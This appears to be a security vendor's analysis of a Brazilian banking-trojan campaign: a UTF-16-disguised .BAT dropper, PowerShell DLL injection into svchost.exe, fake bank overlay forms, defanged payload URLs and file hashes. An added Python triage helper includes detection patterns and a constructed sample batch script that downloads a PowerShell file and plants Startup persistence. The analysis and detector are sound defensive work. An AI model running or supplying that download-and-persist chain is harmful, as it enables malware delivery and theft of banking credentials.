Sneaky .BAT File Leads to Spoofed Banking Page

If you thought using BAT files was old hat, think again. While monitoring our Secure Email Gateway Cloud service, we came across several suspicious spam emails targeting Brazilian users. The email details below show how the message is dressed up to entice recipients into opening the attachment.

The word "paulistana" means 'belonging to, or coming from, São Paulo', which makes the lure more convincing to unsuspecting users.

Here is the English Translation:

Subject: Attached is São Paulo's fiscal note, N – 7632630091

Body:

Attached is the invoice of the provision of services

Regards Josa Martins

Phone (11) 99876-6625

Attachment: Nota Fiscal - Pauline City Hall.zip

The attached ZIP file holds a batch file that is intentionally UTF-16 encoded. When opened in a text editor it displays as a run of traditional Chinese characters.

A byte order mark (BOM) of 0xFEFF is placed at the start of the file (it signals the start of a Unicode text stream), which effectively hides the batch commands from a casual look. In a hex editor, however, the underlying commands are plainly visible.

Analyzing the batch file uncovers the following behavior:

It first creates a directory, C:\{random_directory_name}.

Using PowerShell commands, it downloads a PowerShell script and PShellExec.exe.

Using PShellExec.exe, it encrypts the downloaded PowerShell script, deletes the original and runs the encrypted copy.

Lastly, it creates a VBScript that launches the encrypted PowerShell script. For persistence it creates a symbolic link in the Startup folder.
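As an added example (not part of the original analysis), the triage helper below strips a UTF-16 BOM from a suspicious .bat attachment so the commands become readable, then flags the lines that match the behaviour listed above. The sample script, the directory name, the URL and the PShellExec command line are constructed stand-ins, not the real file, and the match patterns are hypothetical heuristics.

```python
import codecs
import re

# A UTF-16 BOM on a .bat file is unusual in itself and worth flagging.
BOMS = [
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
    (codecs.BOM_UTF8, "utf-8"),
]

# Heuristics derived from the behaviour listed above (hypothetical patterns,
# not signatures taken from the real script).
SUSPICIOUS = {
    "powershell": re.compile(r"powershell", re.I),
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I),
    "pshellexec": re.compile(r"pshellexec", re.I),
    "vbscript": re.compile(r"\.vbs\b|wscript|cscript", re.I),
    "startup_link": re.compile(r"mklink|\\startup\\", re.I),
}

def decode_batch(data: bytes):
    """Strip a BOM if present and return (encoding, decoded script text)."""
    for bom, enc in BOMS:
        if data.startswith(bom):
            return enc, data[len(bom):].decode(enc, errors="replace")
    # No BOM: treat as the ANSI code page cmd.exe would normally assume.
    return "cp1252", data.decode("cp1252", errors="replace")

def triage_batch(data: bytes) -> dict:
    """Decode the script and return every line that matches a heuristic."""
    enc, text = decode_batch(data)
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        tags = [name for name, rx in SUSPICIOUS.items() if rx.search(line)]
        if tags:
            hits[lineno] = (tags, line.strip())
    return {"encoding": enc, "utf16_bom": enc.startswith("utf-16"), "hits": hits}

# Constructed sample that mimics the described steps; the directory name,
# URL and PShellExec command line are made up, not taken from the campaign.
SAMPLE_BAT = (
    "@echo off\r\n"
    "mkdir C:\\kx7q2\r\n"
    "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/1.ps1','C:\\kx7q2\\1.ps1')\"\r\n"
    "C:\\kx7q2\\PShellExec.exe C:\\kx7q2\\1.ps1\r\n"
    "mklink \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Ma.vbs\" C:\\kx7q2\\Ma.vbs\r\n"
)
SAMPLE_BYTES = codecs.BOM_UTF16_LE + SAMPLE_BAT.encode("utf-16-le")
```

Calling triage_batch(SAMPLE_BYTES) reports the UTF-16 encoding and returns the download, PShellExec and Startup-link lines with their matched tags; a plain ANSI batch file without those commands yields no hits.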

Analyzing the PowerShell Script:

At first glance, the script builds on an existing PowerShell script written by Matthew Graeber, known as PowerSyringe, a PowerShell-based code/DLL injection module. The threat actors appended code that does the following:

Generates random characters to be used as directory names.

Checks whether the OS is 32-bit or 64-bit and downloads the corresponding DLL. Decoded Base64 links:

hxxp://panel-anonimato.cf/TMP/Dexter/Arquiteto.64.dll

hxxp://panel-anonimato.cf/TMP/Dexter/Arquiteto.dll

Using the PowerSyringe module, it injects the DLL into svchost.exe.

Injected DLL – The MultiBanker Trojan

Once the DLL is injected into svchost.exe, it monitors the user's activity for attempts to access Brazilian banks. When the user visits one of the online banking sites, it overlays the screen with a fake form that lets the attackers capture the user's PIN codes.

The following banks are targeted, each with its own fake form used to overlay the legitimate page:

Banrisul

Itaú Unibanco

Banco do Nordeste

Banco Santander

Sicoob

Sicredi

Indicators of Compromise:

Nota-Fiscal - Prefeitura Paulistana.bat - attached from an email
MD5: 70EA097616DFC8D4AE8B8AD4BDB1CD96
SHA1: E830EC9F194BF72740D9AB62B633E0862E18A143

Ma{username}.vbs - created by batch file
MD5: 7FDD656E476FC4AEFF19609FD14FB070
SHA1: 451515709EEE19D680A622753CB6802056ED84A5

1.ps1 - downloaded
MD5: BA0239533DD7F85CB0D1DF58FC129222
SHA1: 7366B78713808D4A23C9FC8B141D1DF1C2FB1FED

{random}.ps1.bin - encoded 1.ps1
MD5: BAFAEBF21A288826525BA0703EFC384B
SHA1: A4049F8FE337D148B25DD60AA7F1BF9E783538DD

PShellExec.exe - downloaded
MD5: B34B92270968DB55AB07633C11AD0883
SHA1: EF2AB66243F385559792ED6360D4A5C0D435C328

Arquiteto.64.dll - downloaded - for x64 machines
MD5: ED053046882301A893DDA1171D62DD50
SHA1: 0A1731A6D594C908866A9A317DE9AAA1BADD3AB1

Arquiteto.dll - downloaded - for x86 machines
MD5: E94EA2673908D605F08C6A6D666DC97E
SHA1: 836C0521DF76EDF48447CA1218DFBF3725010F51